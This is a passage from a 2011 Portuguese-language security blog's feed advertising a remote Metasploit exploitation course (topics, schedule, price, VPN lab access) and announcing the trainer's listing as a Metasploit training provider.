Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Browser AutoPwn.&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Metasploit Pro.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Armitage. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Attacking Linux.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Capture the Flag. &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Requisitos Mínimos:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Leitura básica em Inglês Técnico;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Conhecimentos básicos  em redes de computadores (TCP/IP);&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Conhecimentos básicos em linha de comando do Linux/Windows;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Conhecimentos mínimos no Framework Metasploit. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Graduandos em computação;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Pesquisadores;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Penetration Tester que queiram melhorar seus conhecimentos no framework;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Entusiastas em segurança;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Etc…&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Infra-estrutura oferecida:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Apostila [PDF];&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;DVD com Backtrack 4 R2;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;DVD com Distribuição Vulnerável para Testes;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Acesso Remoto ao Hack Training Lab via VPN;*&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Certificado de Conclusão;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Camiseta; &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;*No  primeiro dia de treinamento, será disponibilizado a chave de acesso  para cada participante autenticar no laboratório remoto através de uma  VPN. O laboratório funcionará em regime 24/7, se houver à necessidade de  parada para manutenção, cada participante será avisado com alguma  antecedência através de e-mail, com especificação da data de parada e  previsão de retorno. Também será disponibilizado, em horário comercial,  um contato via mensageiro instantâneo para problemas de conexão ao  laboratório. &lt;span style="color: red;"&gt;O lab ficará disponível ao aluno somente durante o período de treinamento.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Laboratório utilizado no treinamento:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/TTiPoxdF2WI/AAAAAAAAARg/FzQ2igzA-dQ/s1600/hacktraininglab4.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="http://4.bp.blogspot.com/_fzuc26ZLs28/TTiPoxdF2WI/AAAAAAAAARg/FzQ2igzA-dQ/s320/hacktraininglab4.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Carga horária:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="color: red;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Horário A:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;24 horas de treinamento.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;As Segundas, Terças e Quintas das 19hs as 22hs. (8 dias).&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="color: red;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Horário B:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; 24 horas de treinamento.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Aos Sábados das 08hs as 15hs. (4 Sábados).&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="color: red;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Horário C:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;24 horas de treinamento.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;As Segundas, Terças e Quintas das 08hs as 11hs. (8 dias).&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Valor: &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="color: red; font-family: Calibri,sans-serif;"&gt; R$460,00&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; (Quatrocentos e sessenta reais).&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Formas de pagamento:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Através do PAGSeguro UOL (Até 10x) ou Depósito em conta bancária. À vista 10% de desconto.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Local:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;EaD (Ensino à Distância.)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Requisitos de Conexão:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Para o bom proveito do treinamento, aconselhamos uma configuração mínima conforme descrita abaixo:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Conexão banda larga mínima de 512KB;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Navegador: Firefox, Chrome, Safari ou Internet Explorer;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Fone de ouvido com microfone.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;div align="justify"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Contato:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Para os interessados, enviar um e-mail para o seguinte endereço:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;a href="mailto:training@hacktraining.com.br"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;training@hacktraining.com.br&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Com as seguintes especificações:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Nome:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;E-mail:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Telefone:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Como deseja que a Hack Training entre em contato? ( ) E-mail ( ) Telefone&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Mensagem:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: x-large;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Hack Training&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.hacktraining.com.br/" style="font-family: Verdana,sans-serif;"&gt;Hack Training - Offensive Safety&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://metasploit.com/learn-more/how-do-i-use-it/trainings.jsp"&gt;Metasploit Training Providers&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://codesec.blogspot.com/2011/04/hack-training-metasploit-training.html"&gt;CodeSec - How to? - [Post] Hack Training - Metasploit Training Providers&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://twitter.com/hacktraining"&gt;Follow @hacktraining&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="font-family: Verdana,sans-serif;"&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="font-family: Verdana,sans-serif;"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Att,&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;a href="mailto:contato@hacktraining.com.br"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-730842513322437783?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/730842513322437783/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/04/treinamento-metasploit-exploitation.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/730842513322437783'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/730842513322437783'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/04/treinamento-metasploit-exploitation.html' title='Treinamento Metasploit Exploitation - Versão EaD'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_fzuc26ZLs28/TTiPoxdF2WI/AAAAAAAAARg/FzQ2igzA-dQ/s72-c/hacktraininglab4.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-2908022902436495619</id><published>2011-04-01T10:46:00.000-03:00</published><updated>2011-04-01T10:46:21.338-03:00</updated><title type='text'>Hack Training - Metasploit Training Providers</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;/div&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Após um bom tempo de conversa com o pessoal da rapid7, diga-se de passagem, extremamente atenciosos, e com o lançamento do novo layout do site metasploit.com, foi adicionado a seção "Metasploit Training Providers" onde temos o orgulho de estar representando o Brasil com a Hack Training, podendo oferecer treinamentos sobre o metasploit framework e metasploit Pro, com qualidade e profissionais altamente qualificados.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ZzXlLJWBjFg/TZXOoglw4II/AAAAAAAAARs/oGmKw28JDKs/s1600/print_hack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="209" src="http://2.bp.blogspot.com/-ZzXlLJWBjFg/TZXOoglw4II/AAAAAAAAARs/oGmKw28JDKs/s320/print_hack.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Estamos realizando um upgrade em nossa infraestrutura para proporcionar um ambiente próximo ao real para que o participante possa além de aprender a trabalhar com o framework, também possa adquirir experiência necessária para desenvolver um bom trabalho. A Hack Training, atualmente &lt;/span&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;span style="background-attachment: scroll; background-clip: border-box; background-image: none; background-origin: padding-box; background-position: 0% 0%; background-repeat: repeat; background-size: auto auto; border: 0pt none; display: inline; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;conta  com 18 computadores, que consistem de servidores dedicados,  estações de trabalho, laptops, bem como dispositivos portáteis rodando  sob um certo número de plataformas.&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;Para visualizar o conteúdo abordado, por favor, acessem o link abaixo:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;a href="http://codesec.blogspot.com/2011/01/treinamento-metasploit-exploitation.html"&gt;Metasploit Exploitation&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Obs.&lt;/span&gt;&lt;/b&gt;: O conteúdo está sobre constante reformulação, para proporcionar o que está sendo utilizado pelos profissionais de segurança da informação atualmente.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;Se deseja um treinamento em sua cidade e/ou empresa, contate-nos. &lt;/span&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;Contato: &lt;b&gt;espreto@hacktraining.com.br&lt;/b&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;Links:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;a href="http://www.rapid7.com/"&gt;Rapid7&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;a href="http://www.metasploit.com/"&gt;Metasploit&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;a href="http://metasploit.com/learn-more/how-do-i-use-it/trainings.jsp"&gt;Metasploit Training Providers&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;a href="http://www.hacktraining.com.br/"&gt;Hack Training&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background: none repeat scroll 0% 0% transparent; border: 0pt none; display: inline; font-family: Verdana,sans-serif; font-size: 100%; margin: 0pt; outline: 0pt none; padding: 0pt; vertical-align: baseline;"&gt;Att,&amp;nbsp;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-2908022902436495619?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/2908022902436495619/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/04/hack-training-metasploit-training.html#comment-form' title='1 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/2908022902436495619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/2908022902436495619'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/04/hack-training-metasploit-training.html' title='Hack Training - Metasploit Training Providers'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-ZzXlLJWBjFg/TZXOoglw4II/AAAAAAAAARs/oGmKw28JDKs/s72-c/print_hack.PNG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-8908081545274964563</id><published>2011-03-19T14:47:00.000-03:00</published><updated>2011-03-19T14:47:59.640-03:00</updated><title type='text'>Slides - Andradina/SP</title><content type='html'>Uns colegas pediram para ver novamente a apresentação que realizei na faculdade de Andradina e o slide de um curso sobre Metasploit que realizei ano passado.&lt;br /&gt;&lt;br /&gt;Slide Palestra:&lt;br /&gt;&lt;br /&gt;&lt;a href=""&gt;&lt;/a&gt;&lt;br /&gt;&lt;div id="__ss_5544503" style="width: 425px;"&gt;&lt;a href=""&gt; &lt;strong style="display: block; margin: 12px 0pt 4px;"&gt;&lt;/strong&gt;&lt;/a&gt;&lt;strong style="display: block; margin: 12px 0pt 4px;"&gt;&lt;a href="http://www.slideshare.net/robertoespreto/palestra-5544503" title="Current Threads, 